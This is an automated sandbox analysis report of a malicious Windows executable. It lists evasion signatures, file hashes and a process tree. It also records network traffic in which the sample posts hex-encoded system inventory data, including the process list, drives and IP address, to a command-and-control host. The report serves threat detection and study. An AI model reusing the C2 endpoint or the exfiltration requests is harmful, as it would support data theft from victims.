Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5ZH9uXmzGP.exe

Overview

General Information

Sample name:5ZH9uXmzGP.exe
renamed because original name is a hash value
Original sample name:35e2c99a2fed28f4148ef7f4c1431df4.exe
Analysis ID:1578926
MD5:35e2c99a2fed28f4148ef7f4c1431df4
SHA1:8b05aa4709fd09892238baa7a14f42d58dd58d14
SHA256:d01a1b39c935e182b6e4d6c2c15dfe35a59b086fe55bbea0338bc35626a1d3df
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to detect virtual machines (SLDT)
Entry point lies outside standard sections
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files

Classification

Process Tree

  • System is w10x64
  • 5ZH9uXmzGP.exe (PID: 3148 cmdline: "C:\Users\user\Desktop\5ZH9uXmzGP.exe" MD5: 35E2C99A2FED28F4148EF7F4C1431DF4)
    • WerFault.exe (PID: 3176 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3148 -s 1112 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: 5ZH9uXmzGP.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: 5ZH9uXmzGP.exeVirustotal: Detection: 52%Perma Link
Source: 5ZH9uXmzGP.exeReversingLabs: Detection: 50%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: 5ZH9uXmzGP.exeJoe Sandbox ML: detected
Source: 5ZH9uXmzGP.exe, 00000001.00000003.2219046357.0000000007216000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_a4d3432f-0
Source: 5ZH9uXmzGP.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*Content-Type: application/jsonContent-Length: 500630Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 39 34 38 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: global trafficHTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*Content-Type: application/jsonContent-Length: 500630Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 39 34 38 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: global trafficHTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*Content-Type: application/jsonContent-Length: 500630Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 39 34 38 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: global trafficHTTP traffic detected: GET /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*
Source: Joe Sandbox ViewIP Address: 185.121.15.192 185.121.15.192
Source: Joe Sandbox ViewIP Address: 98.85.100.80 98.85.100.80
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: GET /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fivetk5ht.top
Source: unknownHTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*Content-Type: application/jsonContent-Length: 500630Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 39 34 38 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: 5ZH9uXmzGP.exe, 00000001.00000003.2219046357.0000000007216000.00000004.00001000.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
Source: 5ZH9uXmzGP.exe, 00000001.00000003.2219046357.0000000007216000.00000004.00001000.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
Source: 5ZH9uXmzGP.exe, 5ZH9uXmzGP.exe, 00000001.00000002.2415220079.0000000001485000.00000004.00000020.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000003.2319274899.0000000001485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPR
Source: 5ZH9uXmzGP.exe, 00000001.00000002.2415220079.0000000001485000.00000004.00000020.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000003.2319274899.0000000001485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRE_
Source: 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17
Source: 5ZH9uXmzGP.exe, 00000001.00000002.2415220079.000000000142B000.00000004.00000020.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2415220079.00000000013CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
Source: 5ZH9uXmzGP.exe, 00000001.00000002.2415220079.00000000013CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17345798516963
Source: 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851http://home.fivetk5ht.top/zldPRFrmVFHTtKntGp
Source: 5ZH9uXmzGP.exe, 00000001.00000002.2415220079.00000000013CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851z
Source: 5ZH9uXmzGP.exe, 00000001.00000003.2219046357.0000000007216000.00000004.00001000.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
Source: 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: 5ZH9uXmzGP.exe, 00000001.00000003.2219046357.0000000007216000.00000004.00001000.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: 5ZH9uXmzGP.exe, 00000001.00000003.2219046357.0000000007216000.00000004.00001000.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ip
Source: 5ZH9uXmzGP.exe, 00000001.00000003.2219046357.0000000007216000.00000004.00001000.00020000.00000000.sdmp, 5ZH9uXmzGP.exe, 00000001.00000002.2413981644.000000000071D000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714

System Summary

barindex
PE file contains section with special chars
Source: 5ZH9uXmzGP.exeStatic PE information: section name:
Source: 5ZH9uXmzGP.exeStatic PE information: section name: .idata
Source: 5ZH9uXmzGP.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3148 -s 1112
Source: 5ZH9uXmzGP.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: 5ZH9uXmzGP.exeStatic PE information: Section: euhadjik ZLIB complexity 0.9942390467525196
Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@10/2
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3148
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\0723bcbf-fabb-490d-8fde-6d665d2277daJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: 5ZH9uXmzGP.exeVirustotal: Detection: 52%
Source: 5ZH9uXmzGP.exeReversingLabs: Detection: 50%
Source: 5ZH9uXmzGP.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknownProcess created: C:\Users\user\Desktop\5ZH9uXmzGP.exe "C:\Users\user\Desktop\5ZH9uXmzGP.exe"
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3148 -s 1112
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\5ZH9uXmzGP.exeSection loaded: dhcpcsvc6.dllJump to behavior
